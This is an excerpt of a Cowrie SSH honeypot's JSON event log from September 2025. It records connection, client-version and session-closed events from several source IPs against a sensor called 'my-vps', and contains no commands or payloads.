{"eventid":"cowrie.session.connect","src_ip":"92.118.39.95","src_port":37464,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d68fc3d80a0","protocol":"ssh","message":"New connection: 92.118.39.95:37464 (1.2.3.4:22) [session: 3d68fc3d80a0]","sensor":"my-vps","timestamp":"2025-09-09T11:15:58.582686Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54284,"dst_ip":"1.2.3.4","dst_port":22,"session":"96769d32f6aa","protocol":"ssh","message":"New connection: 212.227.125.160:54284 (1.2.3.4:22) [session: 96769d32f6aa]","sensor":"my-vps","timestamp":"2025-09-09T11:18:24.999794Z"}
{"eventid":"cowrie.session.connect","src_ip":"203.195.82.54","src_port":55308,"dst_ip":"1.2.3.4","dst_port":22,"session":"0470cb557fd9","protocol":"ssh","message":"New connection: 203.195.82.54:55308 (1.2.3.4:22) [session: 0470cb557fd9]","sensor":"my-vps","timestamp":"2025-09-09T11:19:40.545020Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57986,"dst_ip":"1.2.3.4","dst_port":22,"session":"aeae0dc16143","protocol":"ssh","message":"New connection: 217.72.205.35:57986 (1.2.3.4:22) [session: aeae0dc16143]","sensor":"my-vps","timestamp":"2025-09-09T11:20:03.725367Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.84.140","src_port":54466,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d621bdfbc4d","protocol":"ssh","message":"New connection: 196.251.84.140:54466 (1.2.3.4:22) [session: 3d621bdfbc4d]","sensor":"my-vps","timestamp":"2025-09-09T11:20:26.783231Z"}
{"eventid":"cowrie.session.closed","duration":"385.5","message":"Connection lost after 385.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T11:20:47.955736Z","src_ip":"217.72.205.35","session":"adc1d555a5c8"}
{"eventid":"cowrie.session.closed","duration":"298.1","message":"Connection lost after 298.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T11:20:47.957714Z","src_ip":"212.227.125.160","session":"9763b3e9f1db"}
{"eventid":"cowrie.session.closed","duration":"208.0","message":"Connection lost after 208.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T11:20:47.958122Z","src_ip":"92.118.39.95","session":"3d68fc3d80a0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T11:20:47.958430Z","src_ip":"212.227.125.160","session":"96769d32f6aa"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T11:20:47.958813Z","src_ip":"203.195.82.54","session":"0470cb557fd9"}
{"eventid":"cowrie.session.closed","duration":"22.9","message":"Connection lost after 22.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T11:20:47.959249Z","src_ip":"217.72.205.35","session":"aeae0dc16143"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T11:20:47.959623Z","src_ip":"196.251.84.140","session":"3d621bdfbc4d"}
{"eventid":"cowrie.session.closed","duration":"45.8","message":"Connection lost after 45.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T11:20:47.959991Z","src_ip":"203.195.82.54","session":"0470cb557fd9"}
{"eventid":"cowrie.session.closed","duration":"132.4","message":"Connection lost after 132.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T11:21:51.793978Z","src_ip":"212.227.125.160","session":"96769d32f6aa"}